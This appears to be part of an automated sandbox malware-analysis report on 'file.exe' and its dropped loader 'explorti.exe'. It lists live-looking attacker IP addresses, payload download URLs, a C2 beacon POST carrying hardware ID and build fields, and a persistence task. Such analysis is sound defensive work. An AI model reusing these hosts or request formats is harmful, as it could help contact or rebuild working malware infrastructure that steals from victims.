Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.30
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.30
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.30
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.30
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.30
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.30
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.30
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.30
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.30
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.30
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.30
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.30
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.30
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.30
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.30
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.30
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.30
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.30
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.30
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_0019BD30 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 12_2_0019BD30
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/amadka.exe HTTP/1.1Host: 77.91.77.81Cache-Control: no-cache
Source: unknown HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIDGCGCBFBAKFHIJDBAHost: 85.28.47.30Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 44 47 43 47 43 42 46 42 41 4b 46 48 49 4a 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 36 39 31 37 45 39 36 37 44 32 31 33 38 35 39 31 33 37 30 34 39 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 44 47 43 47 43 42 46 42 41 4b 46 48 49 4a 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4e 69 63 65 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 44 47 43 47 43 42 46 42 41 4b 46 48 49 4a 44 42 41 2d 2d 0d 0a Data Ascii: ------HIIDGCGCBFBAKFHIJDBAContent-Disposition: form-data; name="hwid"66917E967D213859137049------HIIDGCGCBFBAKFHIJDBAContent-Disposition: form-data; name="build"Nice------HIIDGCGCBFBAKFHIJDBA--
Source: file.exe, 00000000.00000002.1818332466.00000000004F8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/cost/go.exe
Source: file.exe, 00000000.00000002.1818332466.00000000004F8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/cost/go.exe00
Source: file.exe, 00000000.00000002.1818332466.00000000004F8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/cost/go.exeData
Source: file.exe, 00000000.00000002.1818332466.00000000004F8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exe
Source: file.exe, 00000000.00000002.1818332466.00000000004F8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exe-Disposition:
Source: file.exe, 00000000.00000002.1818332466.00000000004F8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exe00
Source: file.exe, 00000000.00000002.1822925903.000000000134B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exeQ
Source: explorti.exe, 0000000C.00000002.2879968817.00000000014BB000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000C.00000002.2879968817.0000000001529000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php
Source: explorti.exe, 0000000C.00000002.2879968817.00000000014BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php#
Source: explorti.exe, 0000000C.00000002.2879968817.00000000014BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php-
Source: explorti.exe, 0000000C.00000002.2879968817.00000000014FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php/
Source: explorti.exe, 0000000C.00000002.2879968817.00000000014BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php
Source: explorti.exe, 0000000C.00000002.2879968817.00000000014BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php40971b6b
Source: explorti.exe, 0000000C.00000002.2879968817.00000000014BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php8.
Source: explorti.exe, 0000000C.00000002.2879968817.00000000014BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php9
Source: explorti.exe, 0000000C.00000002.2879968817.00000000014BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpG
Source: explorti.exe, 0000000C.00000002.2879968817.00000000014BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpZ
Source: explorti.exe, 0000000C.00000002.2879968817.00000000014BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpq)
Source: explorti.exe, 0000000C.00000002.2879968817.00000000014BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpt.
Source: file.exe, 00000000.00000002.1822925903.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30
Source: file.exe, 00000000.00000002.1822925903.000000000134B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/freebl3.dll
Source: file.exe, 00000000.00000002.1822925903.000000000134B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/mozglue.dll
Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/mozglue.dllhg
Source: file.exe, 00000000.00000002.1822925903.000000000135F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/msvcp140.dll
Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/nss3.dll
Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/nss3.dlldf
Source: file.exe, 00000000.00000002.1822925903.000000000135F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/softokn3.dll
Source: file.exe, 00000000.00000002.1822925903.000000000135F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/softokn3.dll=
Source: file.exe, 00000000.00000002.1822925903.000000000134B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/sqlite3.dll
Source: file.exe, 00000000.00000002.1822925903.000000000147A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/vcruntime140.dll
Source: file.exe, 00000000.00000002.1822925903.0000000001324000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/920475a59bac849d.php
Source: file.exe, 00000000.00000002.1822925903.0000000001324000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/920475a59bac849d.phpI
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: file.exe String found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
Source: file.exe String found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr
Source: file.exe String found in binary or memory: http://pki-ocsp.symauth.com0
Source: Amcache.hve.3.dr String found in binary or memory: http://upx.sf.net
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.1855343572.000000001CA4C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1868672282.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecop
Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecopnacl
Source: CFIEGDAE.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1822925903.000000000147A000.00000004.00000020.00020000.00000000.sdmp, FCAAEHJDBKJJKFHJEBKF.0.dr String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1822925903.000000000147A000.00000004.00000020.00020000.00000000.sdmp, FCAAEHJDBKJJKFHJEBKF.0.dr String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: CFIEGDAE.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp, CFIEGDAE.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp, CFIEGDAE.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1822925903.000000000147A000.00000004.00000020.00020000.00000000.sdmp, FCAAEHJDBKJJKFHJEBKF.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1822925903.000000000147A000.00000004.00000020.00020000.00000000.sdmp, FCAAEHJDBKJJKFHJEBKF.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp, CFIEGDAE.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: CFIEGDAE.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp, CFIEGDAE.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: FCAAEHJDBKJJKFHJEBKF.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: HDAFBGIJKEGIECAAFHDHDGCBFC.0.dr String found in binary or memory: https://support.mozilla.org
Source: HDAFBGIJKEGIECAAFHDHDGCBFC.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: HDAFBGIJKEGIECAAFHDHDGCBFC.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: file.exe, 00000000.00000002.1818332466.00000000005FA000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1703015007.00000000229CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: file.exe, 00000000.00000002.1818332466.00000000005FA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
Source: file.exe, 00000000.00000002.1818332466.00000000005FA000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1703015007.00000000229CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: file.exe, 00000000.00000002.1818332466.00000000005FA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1822925903.000000000147A000.00000004.00000020.00020000.00000000.sdmp, FCAAEHJDBKJJKFHJEBKF.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: CFIEGDAE.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1822925903.000000000147A000.00000004.00000020.00020000.00000000.sdmp, FCAAEHJDBKJJKFHJEBKF.0.dr String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: CFIEGDAE.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: HDAFBGIJKEGIECAAFHDHDGCBFC.0.dr String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.1818332466.00000000004F8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: file.exe, 00000000.00000002.1818332466.00000000004F8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/dHh0
Source: HDAFBGIJKEGIECAAFHDHDGCBFC.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: file.exe, 00000000.00000002.1818332466.00000000004F8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: file.exe, 00000000.00000002.1818332466.00000000004F8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/VxHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0
Source: HDAFBGIJKEGIECAAFHDHDGCBFC.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: file.exe, 00000000.00000002.1818332466.00000000004F8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.1771969155.0000000028F69000.00000004.00000020.00020000.00000000.sdmp, HDAFBGIJKEGIECAAFHDHDGCBFC.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: HDAFBGIJKEGIECAAFHDHDGCBFC.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.1818332466.00000000004F8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.1771969155.0000000028F69000.00000004.00000020.00020000.00000000.sdmp, HDAFBGIJKEGIECAAFHDHDGCBFC.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000002.1818332466.00000000004F8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe

System Summary
barindex
PE file contains section with special chars
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: JJEGIJEGDB.exe.0.dr Static PE information: section name:
Source: JJEGIJEGDB.exe.0.dr Static PE information: section name: .idata
Source: JJEGIJEGDB.exe.0.dr Static PE information: section name:
Source: explorti.exe.5.dr Static PE information: section name:
Source: explorti.exe.5.dr Static PE information: section name: .idata
Source: explorti.exe.5.dr Static PE information: section name:
PE file has nameless sections
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Contains functionality to call native functions
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C61ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset, 0_2_6C61ED10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C65B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C65B700
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C65B8C0 rand_s,NtQueryVirtualMemory, 0_2_6C65B8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C65B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C65B910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5FF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C5FF280
Creates files inside the system directory
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F35A0 0_2_6C5F35A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C605477 0_2_6C605477
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C66545C 0_2_6C66545C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C66542B 0_2_6C66542B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C66AC00 0_2_6C66AC00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C635C10 0_2_6C635C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C636CF0 0_2_6C636CF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6064C0 0_2_6C6064C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C61D4D0 0_2_6C61D4D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5FD4E0 0_2_6C5FD4E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6534A0 0_2_6C6534A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C65C4A0 0_2_6C65C4A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C606C80 0_2_6C606C80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C60FD00 0_2_6C60FD00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C620512 0_2_6C620512
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C61ED10 0_2_6C61ED10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6585F0 0_2_6C6585F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C630DD0 0_2_6C630DD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C666E63 0_2_6C666E63
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C614640 0_2_6C614640
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C642E4E 0_2_6C642E4E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5FC670 0_2_6C5FC670
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C619E50 0_2_6C619E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C633E50 0_2_6C633E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C659E30 0_2_6C659E30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C645600 0_2_6C645600
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C637E10 0_2_6C637E10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6676E3 0_2_6C6676E3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C60FEF0 0_2_6C60FEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5FBEF0 0_2_6C5FBEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C654EA0 0_2_6C654EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C65E680 0_2_6C65E680
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C615E90 0_2_6C615E90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C609F00 0_2_6C609F00
